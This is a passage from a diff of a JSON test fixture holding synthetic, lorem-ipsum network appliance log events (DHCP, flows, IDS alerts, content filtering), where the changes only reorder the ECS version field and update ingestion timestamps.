security_event olaborissecurity_event tur url=https://example.org/odoco/ria.jpg?ritin=uredolor#tatemac src=10.15.44.253:5078 dst=10.193.124.51:5293 mac=01:00:5e:28:ae:7d name=psa sha256=umq disposition=ntium action=deny", "event": { - "ingested": "2021-09-07T12:47:57.558223400Z" + "ingested": "2021-12-14T14:40:26.865179859Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umdo 1455282753.itessequ vol_ events dhcp lease of ip 10.102.218.31 from server mac 01:00:5e:9c:c2:9c for client mac 01:00:5e:0f:87:e3 from router 10.15.16.212 on subnet ameaqu with dns aqu", "event": { - "ingested": "2021-09-07T12:47:57.558248900Z" + "ingested": "2021-12-14T14:40:26.865183014Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uipexea 1456517708.tatio minim_ flows ceroinBC flows src=10.179.60.216 dst=10.69.53.104 protocol=udp pattern: 0 reprehe", "event": { - "ingested": "2021-09-07T12:47:57.558277900Z" + "ingested": "2021-12-14T14:40:26.865183516Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mipsu 1457752662.consec taliquip_ flows radip flows block src=10.155.236.240 dst=10.112.46.169 mac=01:00:5e:7a:74:89 protocol=ipv6 type=roidents ", "event": { - "ingested": "2021-09-07T12:47:57.558284300Z" + "ingested": "2021-12-14T14:40:26.865183939Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "obeataev 1458987616.lor uidexea_appliance events MAC 01:00:5e:e1:89:ac and MAC 01:00:5e:a3:d9:ac both claim IP: 10.14.107.140", "event": { - "ingested": "2021-09-07T12:47:57.558289900Z" + "ingested": "2021-12-14T14:40:26.865184398Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iutal 1460222571.dexe urerep events content_filtering_block url='https://api.example.org/liqu/lorem.gif?ueipsaqu=uidolore#niamqu' category0='ari' server='10.108.180.105:5098' client_mac='01:00:5e:40:9b:83'", "event": { - "ingested": "2021-09-07T12:47:57.558295200Z" + "ingested": "2021-12-14T14:40:26.865184790Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ipit 1461457525.idexea riat_appliance events MAC 01:00:5e:25:4f:e4 and MAC 01:00:5e:3f:49:e4 both claim IP: 10.149.88.198", "event": { - "ingested": "2021-09-07T12:47:57.558300600Z" + "ingested": "2021-12-14T14:40:26.865185196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntsuntin 1462692479.aecatcup animi events dhcp release for mac 01:00:5e:e3:10:34", "event": { - "ingested": "2021-09-07T12:47:57.558305800Z" + "ingested": "2021-12-14T14:40:26.865185595Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orsitame 1463927433.quiratio ite events MAC 01:00:5e:48:62:22 and MAC 01:00:5e:9f:b6:a6 both claim IP: 10.243.206.225", "event": { - "ingested": "2021-09-07T12:47:57.558310900Z" + "ingested": "2021-12-14T14:40:26.865186001Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupta turveli.toccae tatno_ ids-alerts taliqu ids-alerts signature=temUten priority=ccusan timestamp=1465162388.iqudirection=outbound protocol=icmp src=10.131.82.116:7307", "event": { - "ingested": "2021-09-07T12:47:57.558316300Z" + "ingested": "2021-12-14T14:40:26.865186421Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uaera 1466397342.sitas ehenderi_ security_event atquovosecurity_event iumto url=https://www5.example.net/sun/essecill.html?saute=vel#quu src=10.210.213.18:7616 dst=10.134.0.141:2703 mac=01:00:5e:aa:42:fa name=idolores sha256=llumquid disposition=tation action=accept", "event": { - "ingested": "2021-09-07T12:47:57.558323100Z" + "ingested": "2021-12-14T14:40:26.865186810Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "omn ipsumq.atcu oremagna_ security_event remipsum security_event liq signature=ist priority=tnon timestamp=1467632296.ionul shost=01:00:5e:c8:9c:2f direction=outbound protocol=udp src=10.163.72.17 dst=10.74.237.180 message:nsequu", "event": { - "ingested": "2021-09-07T12:47:57.558328600Z" + "ingested": "2021-12-14T14:40:26.865187583Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "omm 1468867250.idestla Nemoeni_appliance events MAC 01:00:5e:c4:69:7f and MAC 01:00:5e:e2:67:d2 both claim IP: 10.72.31.26", "event": { - "ingested": "2021-09-07T12:47:57.558333400Z" + "ingested": "2021-12-14T14:40:26.865193925Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "agna tionemu.eomnisis mqui ids-alerts signature=civeli priority=errorsi timestamp=1470102205.desdirection=internal protocol=tcp src=10.70.95.74:4290", "event": { - "ingested": "2021-09-07T12:47:57.558338200Z" + "ingested": "2021-12-14T14:40:26.865194409Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupt 1471337159.dit sumquiad events MAC 01:00:5e:ea:e8:7a and MAC 01:00:5e:9c:d2:4a both claim IP: 10.17.21.125", "event": { - "ingested": "2021-09-07T12:47:57.558343100Z" + "ingested": "2021-12-14T14:40:26.865194848Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amqu 1472572113.uines nsec events dhcp lease of ip 10.85.10.165 from server mac 01:00:5e:63:93:48 for client mac 01:00:5e:46:17:35 from router 10.53.150.119 on subnet uiineavo with dns tisetq", "event": { - "ingested": "2021-09-07T12:47:57.558347800Z" + "ingested": "2021-12-14T14:40:26.865195246Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "giatquov eritquii.dexeac iscinge ids-alerts signature=atvol priority=umiur timestamp=1473807067.imadprotocol=igmp src=10.88.231.224 dst=10.187.77.245message: iadese", "event": { - "ingested": "2021-09-07T12:47:57.558352300Z" + "ingested": "2021-12-14T14:40:26.865195803Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "agnaali 1475042022.gnam tat events content_filtering_block url='https://internal.example.com/quae/maccusa.htm?rQuisau=idex#xerci' category0='aqu' server='10.186.58.115:7238' client_mac='01:00:5e:8f:16:6d'", "event": { - "ingested": "2021-09-07T12:47:57.558357Z" + "ingested": "2021-12-14T14:40:26.865196202Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "apariat 1476276976.tlabore untmolli_ events dhcp lease of ip 10.219.84.37 from server mac 01:00:5e:e8:bf:69 for client mac 01:00:5e:87:e1:a0 from router 10.205.47.51 on subnet uovolup with dns samvolu", "event": { - "ingested": "2021-09-07T12:47:57.558368100Z" + "ingested": "2021-12-14T14:40:26.865196606Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ento 1477511930.pic evita events MAC 01:00:5e:ce:61:db and MAC 01:00:5e:ec:f8:cc both claim IP: 10.3.134.237", "event": { - "ingested": "2021-09-07T12:47:57.558373Z" + "ingested": "2021-12-14T14:40:26.865197015Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tmo 1478746884.fficiade uscipit events aid=vitaedi arp_resp=fugitse arp_src=veniamq auth_neg_dur=one auth_neg_failed=etMalor channel=ipi dns_req_rtt=reseos dns_resp=pariatu dns_server=tin duration=48.123000 full_conn=oquisqu identity=sperna ip_resp=eabilloi ip_src=10.182.178.217 is_8021x=tlab is_wpa=volupt last_auth_ago=osqui radio=xerc reason=iutali rssi=fdeFi type=texp vap=tasuntex client_mac=01:00:5e:e3:b1:24 client_ip=10.194.114.58 instigator=ectio http_resp=dutper dhcp_lease_completed=lamcolab dhcp_ip=ati dhcp_server=tlabo dhcp_server_mac=uames dhcp_resp=iduntu url=https://internal.example.net/ris/uamqu.txt?liqui=quioffi#uptate category0=ncidid server=10.63.194.87 vpn_type=quisno connectivity=sin", "event": { - "ingested": "2021-09-07T12:47:57.558377500Z" + "ingested": "2021-12-14T14:40:26.865197424Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "emvel 1479981839.tmollita fde events aid=nsecte arp_resp=inculpa arp_src=abo auth_neg_dur=veniamqu auth_neg_failed=nse channel=non dns_req_rtt=paquioff dns_resp=mquisnos dns_server=maven duration=71.798000 full_conn=atcu identity=labor ip_resp=didunt ip_src=10.153.0.77 is_8021x=udan is_wpa=orema last_auth_ago=invento radio=qua reason=aturQui rssi=utlabor type=rau vap=idex client_mac=01:00:5e:9e:7b:a4 client_ip=10.105.88.20 instigator=ecte http_resp=tinvolu dhcp_lease_completed=iurer dhcp_ip=iciadese dhcp_server=quidolor dhcp_server_mac=tessec dhcp_resp=olupta url=https://mail.example.com/icabo/itatio.jpg?eleum=sintoc#volupt category0=siste server=10.163.154.210 vpn_type=ept connectivity=iumtotam", "event": { - "ingested": "2021-09-07T12:47:57.558382400Z" + "ingested": "2021-12-14T14:40:26.865197824Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ionevo 1481216793.ugiatnu ciati_appliance events MAC 01:00:5e:b8:7a:96 and MAC 01:00:5e:b9:6b:a8 both claim IP: 10.73.69.176", "event": { - "ingested": "2021-09-07T12:47:57.558386800Z" + "ingested": "2021-12-14T14:40:26.865198217Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "spi 1482451747.stquido ommodico_ flows ese flows allow src=10.145.248.111 dst=10.57.6.252 mac=01:00:5e:94:6a:cf protocol=udp ", "event": { - "ingested": "2021-09-07T12:47:57.558391200Z" + "ingested": "2021-12-14T14:40:26.865198736Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "smo etcons.iusmodi uamest_ security_event uiac security_event epte signature=idolo priority=quinesc timestamp=1483686701.madmi shost=01:00:5e:1c:4c:64 direction=internal protocol=icmp src=10.31.77.157 dst=10.12.182.70 message:tev", "event": { - "ingested": "2021-09-07T12:47:57.558395800Z" + "ingested": "2021-12-14T14:40:26.865199145Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nisiuta 1484921656.roid inibusB flows cancel", "event": { - "ingested": "2021-09-07T12:47:57.558404500Z" + "ingested": "2021-12-14T14:40:26.865199593Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "str 1486156610.idolore pid_ flows cteturad flows deny src=10.93.68.231 dst=10.135.217.12 mac=01:00:5e:4a:69:5b protocol=ipv6 type=archite ", "event": { - "ingested": "2021-09-07T12:47:57.558409300Z" + "ingested": "2021-12-14T14:40:26.865200016Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amnih 1487391564.ium esciuntN_ events dhcp release for mac 01:00:5e:8b:99:98", "event": { - "ingested": "2021-09-07T12:47:57.558414200Z" + "ingested": "2021-12-14T14:40:26.865200438Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "isnost 1488626519.queips ncidi_ flows iscinge flows src=10.247.30.212 dst=10.66.89.5 mac=01:00:5e:7f:65:da protocol=igmp pattern: 1 borios", "event": { - "ingested": "2021-09-07T12:47:57.558418300Z" + "ingested": "2021-12-14T14:40:26.865200831Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oin 1489861473.mvenia madminim events IDS: fugitsed", "event": { - "ingested": "2021-09-07T12:47:57.558422300Z" + "ingested": "2021-12-14T14:40:26.865201229Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmin fugi.quia iduntu security_event idestlab signature=rnatur priority=ofdeFin timestamp=1491096427.essequam dhost=01:00:5e:c1:53:b1 direction=inbound protocol=tcp src=10.221.102.245 dst=10.173.136.186 message:naal", "event": { - "ingested": "2021-09-07T12:47:57.558426800Z" + "ingested": "2021-12-14T14:40:26.865201635Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umqu tinv.adipisc uscipitl_ ids-alerts ritatise ids-alerts signature=uamei priority=siut timestamp=1492331381.ciad dhost=01:00:5e:1f:c6:29 direction=external protocol=udp src=10.58.64.108 dst=10.54.37.86 message: entorev", "event": { - "ingested": "2021-09-07T12:47:57.558430900Z" + "ingested": "2021-12-14T14:40:26.865202032Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "velitess 1493566336.naali uunturm_ flows veli flows block src=10.147.76.202 dst=10.163.93.20 mac=01:00:5e:1d:85:ec protocol=ipv6 sport=1085 dport=3141 ", "event": { - "ingested": "2021-09-07T12:47:57.558434700Z" + "ingested": "2021-12-14T14:40:26.865202427Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iumdol tpersp.stla uptatema_ security_event uradi security_event tot signature=llamco priority=nea timestamp=1494801290.psum dhost=01:00:5e:35:71:1e direction=internal protocol=icmp src=10.0.200.27:5905 dst=10.183.44.198:1702 message:asiarc", "event": { - "ingested": "2021-09-07T12:47:57.558440800Z" + "ingested": "2021-12-14T14:40:26.865202814Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tiaec 1496036244.rumwrit icabo_ events dhcp lease of ip 10.148.124.84 from server mac 01:00:5e:0b:2c:22 for client mac 01:00:5e:06:12:98 from router 10.28.144.180 on subnet ritin with dns temporin", "event": { - "ingested": "2021-09-07T12:47:57.558445Z" + "ingested": "2021-12-14T14:40:26.865203340Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ica 1497271198.lillum remips_appliance events aid=uisaute arp_resp=imide arp_src=poriss auth_neg_dur=tvolup auth_neg_failed=itesseq channel=dictasun dns_req_rtt=veniamqu dns_resp=rum dns_server=quaea duration=165.611000 full_conn=mvel identity=nof ip_resp=usmodi ip_src=10.204.230.166 is_8021x=dat is_wpa=aincidu last_auth_ago=nimadmin radio=isiu reason=licabo rssi=enimadmi type=utaliqu vap=dic client_mac=01:00:5e:bb:60:a6 client_ip=10.62.71.118 instigator=ineavol http_resp=iosa dhcp_lease_completed=boNemoe dhcp_ip=onsequ dhcp_server=equinesc dhcp_server_mac=cab dhcp_resp=atisund url=https://example.net/ites/isetq.gif?nisiut=tur#avolupt category0=ariatur server=10.98.194.212 vpn_type=nimave connectivity=isciv", "event": { - "ingested": "2021-09-07T12:47:57.558449200Z" + "ingested": "2021-12-14T14:40:26.865203752Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dipisci 1498506153.spernatu admi events content_filtering_block url='https://www.example.org/ueipsa/tae.html?eriti=atcupi#corpori' category0='borisnis' server='10.197.13.39:5912'", "event": { - "ingested": "2021-09-07T12:47:57.558453100Z" + "ingested": "2021-12-14T14:40:26.865204147Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "itsedd 1499741107.leumiur eratvol events dhcp release for mac 01:00:5e:fd:84:bb", "event": { - "ingested": "2021-09-07T12:47:57.558456800Z" + "ingested": "2021-12-14T14:40:26.865204543Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "leumiu tla.item nimid ids-alerts signature=dat priority=periam timestamp=1500976061.dquprotocol=icmp src=10.242.77.170 dst=10.150.245.88message: orisn", "event": { - "ingested": "2021-09-07T12:47:57.558460600Z" + "ingested": "2021-12-14T14:40:26.865204930Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sitam rad.loi isc_ ids-alerts volupt ids-alerts signature=rem priority=idid timestamp=1502211015.tesse shost=01:00:5e:9d:eb:fb direction=external protocol=tcp src=10.247.139.239 dst=10.180.195.43 message: tenatuse", "event": { - "ingested": "2021-09-07T12:47:57.558464500Z" + "ingested": "2021-12-14T14:40:26.865205321Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tore 1503445970.elits consequa events dhcp release for mac 01:00:5e:50:48:c4", "event": { - "ingested": "2021-09-07T12:47:57.558468300Z" + "ingested": "2021-12-14T14:40:26.865205754Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "undeom uamnihi.risnis uov_ ids-alerts isn ids-alerts signature=sBono priority=loremqu timestamp=1504680924.teturprotocol=rdp src=10.94.6.140 dst=10.147.15.213message: uptat", "event": { - "ingested": "2021-09-07T12:47:57.558472100Z" + "ingested": "2021-12-14T14:40:26.865206188Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "itasper 1505915878.uae mve_ flows obeata flows block src=10.230.6.127 dst=10.111.157.56 mac=01:00:5e:39:a7:fc protocol=icmp type=aliquamq ", "event": { - "ingested": "2021-09-07T12:47:57.558476200Z" + "ingested": "2021-12-14T14:40:26.865206599Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "archite 1507150832.remq veniamq events aid=occ arp_resp=oloreseo arp_src=iruredol auth_neg_dur=veniamqu auth_neg_failed=licaboN channel=atquo dns_req_rtt=cupi dns_resp=strude dns_server=eritin duration=85.513000 full_conn=litsedq identity=nderiti ip_resp=ntNe ip_src=10.179.40.170 is_8021x=olorema is_wpa=mollita last_auth_ago=tatem radio=iae reason=quido rssi=emip type=inBC vap=mol client_mac=01:00:5e:58:2d:1c client_ip=10.153.81.206 instigator=rsita http_resp=nsequun dhcp_lease_completed=eetd dhcp_ip=illu dhcp_server=iatqu dhcp_server_mac=lorsi dhcp_resp=repreh url=https://www.example.net/irured/illumqui.txt?tionula=ritqu#ecatcupi category0=uamei server=10.193.219.34 vpn_type=onse connectivity=olorem", "event": { - "ingested": "2021-09-07T12:47:57.558480Z" + "ingested": "2021-12-14T14:40:26.865206996Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umwritte 1508385787.vol oremquel_appliance events MAC 01:00:5e:16:5e:b1 and MAC 01:00:5e:ee:e8:77 both claim IP: 10.255.199.16", "event": { - "ingested": "2021-09-07T12:47:57.558483800Z" + "ingested": "2021-12-14T14:40:26.865207395Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "unte 1509620741.uamnihil llam_appliance events MAC 01:00:5e:ee:1d:77 and MAC 01:00:5e:f1:21:bd both claim IP: 10.94.88.5", "event": { - "ingested": "2021-09-07T12:47:57.558487800Z" + "ingested": "2021-12-14T14:40:26.865207795Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "esci 1510855695.uov quaeab_ events IDS: moles", "event": { - "ingested": "2021-09-07T12:47:57.558491600Z" + "ingested": "2021-12-14T14:40:26.865208196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "accusa 1512090649.natu liquid events IDS: enim", "event": { - "ingested": "2021-09-07T12:47:57.558495700Z" + "ingested": "2021-12-14T14:40:26.865208591Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dquiaco nibus.vitaed ser security_event etconsec signature=elillum priority=upt timestamp=1513325604.rnat dhost=01:00:5e:01:60:e0 direction=internal protocol=ipv6 src=10.90.99.245 dst=10.124.63.4 message:pta", "event": { - "ingested": "2021-09-07T12:47:57.558499700Z" + "ingested": "2021-12-14T14:40:26.865208985Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tetura 1514560558.imadmini moe_appliance events content_filtering_block url='https://mail.example.net/uat/lupta.html?uptassit=ncidi#tlabori' category0='laudan' server='10.249.7.146:2010'", "event": { - "ingested": "2021-09-07T12:47:57.558503600Z" + "ingested": "2021-12-14T14:40:26.865209376Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lapar 1515795512.ritati edquia_appliance events IDS: itesse", "event": { - "ingested": "2021-09-07T12:47:57.558507400Z" + "ingested": "2021-12-14T14:40:26.865209879Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amvolu mip.tion tobeatae_ security_event Utenima security_event iqua signature=luptat priority=deriti timestamp=1517030466.sintocc dhost=01:00:5e:c9:b7:22 direction=inbound protocol=icmp src=10.196.96.162 dst=10.81.234.34 message:equuntur", "event": { - "ingested": "2021-09-07T12:47:57.558511800Z" + "ingested": "2021-12-14T14:40:26.865210286Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uide 1518265421.scivel henderi_appliance events IDS: iusmodt", "event": { - "ingested": "2021-09-07T12:47:57.558515600Z" + "ingested": "2021-12-14T14:40:26.865210702Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tiumd 1519500375.ntmoll mexer events dhcp lease of ip 10.40.101.224 from server mac 01:00:5e:0a:df:72 for client mac 01:00:5e:7c:01:ab with hostname remips188.api.invalid from router 10.78.199.43 on subnet ehender with dns ilmole", "event": { - "ingested": "2021-09-07T12:47:57.558519500Z" + "ingested": "2021-12-14T14:40:26.865211255Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runtmo 1520735329.ore isund_appliance events MAC 01:00:5e:17:87:3e and MAC 01:00:5e:5f:c1:3e both claim IP: 10.244.29.119", "event": { - "ingested": "2021-09-07T12:47:57.558523400Z" + "ingested": "2021-12-14T14:40:26.865211726Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tutlabor 1521970284.reseosq gna_ flows pteurs flows deny src=10.83.131.245 dst=10.39.172.93 mac=01:00:5e:c4:12:c7 protocol=udp type=uido ", "event": { - "ingested": "2021-09-07T12:47:57.558528700Z" + "ingested": "2021-12-14T14:40:26.865212126Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "osquira 1523205238.umd sciveli_ events dhcp lease of ip 10.86.188.179 from server mac 01:00:5e:48:4b:78 for client mac 01:00:5e:7e:cd:15 from router 10.201.168.116 on subnet umiure with dns laborum", "event": { - "ingested": "2021-09-07T12:47:57.558532700Z" + "ingested": "2021-12-14T14:40:26.865212521Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umdolors 1524440192.lumdo acom_ security_event umexercisecurity_event duntut url=https://mail.example.com/prehend/eufug.htm?eufug=est#civelits src=10.148.211.222:2053 dst=10.122.204.151:3903 mac=01:00:5e:c3:a0:dc name=ine sha256=urerepre disposition=asnulap action=deny", "event": { - "ingested": "2021-09-07T12:47:57.558536600Z" + "ingested": "2021-12-14T14:40:26.865212918Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "atnul 1525675146.umfugi stquidol_ flows luptatem flows accept", "event": { - "ingested": "2021-09-07T12:47:57.558540600Z" + "ingested": "2021-12-14T14:40:26.865213336Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "essequam ueporro.aliqu upt ids-alerts signature=orum priority=Bonoru timestamp=1526910101.madminimprotocol=ipv6-icmp src=10.97.46.16 dst=10.120.4.9message: teni", "event": { - "ingested": "2021-09-07T12:47:57.558544500Z" + "ingested": "2021-12-14T14:40:26.865213729Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lorsitam tanimid.onpr litseddo_ ids-alerts oremqu ids-alerts signature=idex priority=radip timestamp=1528145055.uptaprotocol=ipv6-icmp src=10.171.206.139 dst=10.165.173.162message: lestia", "event": { - "ingested": "2021-09-07T12:47:57.558548100Z" + "ingested": "2021-12-14T14:40:26.865214142Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inibusB 1529380009.nostrud cteturad events dhcp lease of ip 10.150.163.151 from server mac 01:00:5e:72:b7:79 for client mac 01:00:5e:f2:d3:12 with hostname uames4985.mail.localdomain from router 10.144.57.239 on subnet oinBCSed with dns orem", "event": { - "ingested": "2021-09-07T12:47:57.558551700Z" + "ingested": "2021-12-14T14:40:26.865214537Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eritq rehen.ipsamvol elillum_ ids-alerts tco ids-alerts signature=tvol priority=oluptate timestamp=1530614963.lit shost=01:00:5e:ac:6d:d3 direction=unknown protocol=igmp src=10.52.202.158 dst=10.54.44.231 message: Ute", "event": { - "ingested": "2021-09-07T12:47:57.558555400Z" + "ingested": "2021-12-14T14:40:26.865214935Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runtm 1531849918.eturadip olorsi_ events MAC 01:00:5e:67:1d:0f and MAC 01:00:5e:f0:a9:cd both claim IP: 10.101.183.86", "event": { - "ingested": "2021-09-07T12:47:57.558559300Z" + "ingested": "2021-12-14T14:40:26.865217350Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inesciu 1533084872.quid atcupid_ flows orem flows src=10.71.22.225 dst=10.4.76.100 protocol=ggp pattern: allow serrorsi", "event": { - "ingested": "2021-09-07T12:47:57.558563100Z" + "ingested": "2021-12-14T14:40:26.865217768Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lamco 1534319826.cit siar events MAC 01:00:5e:80:cd:ca and MAC 01:00:5e:45:aa:51 both claim IP: 10.83.130.95", "event": { - "ingested": "2021-09-07T12:47:57.558567Z" + "ingested": "2021-12-14T14:40:26.865218176Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "hite 1535554780.ianonnum nofdeFi events aid=henderit arp_resp=remq arp_src=unt auth_neg_dur=tla auth_neg_failed=arch channel=lite dns_req_rtt=ugia dns_resp=meum dns_server=borumSec duration=91.439000 full_conn=nvolupta identity=tev ip_resp=nre ip_src=10.2.110.73 is_8021x=eturadip is_wpa=ent last_auth_ago=rumSecti radio=Utenima reason=olore rssi=orumS type=olor vap=radip client_mac=01:00:5e:59:bf:36 client_ip=10.230.98.81 instigator=aaliquaU http_resp=olu dhcp_lease_completed=iameaque dhcp_ip=identsun dhcp_server=ender dhcp_server_mac=inc dhcp_resp=tect 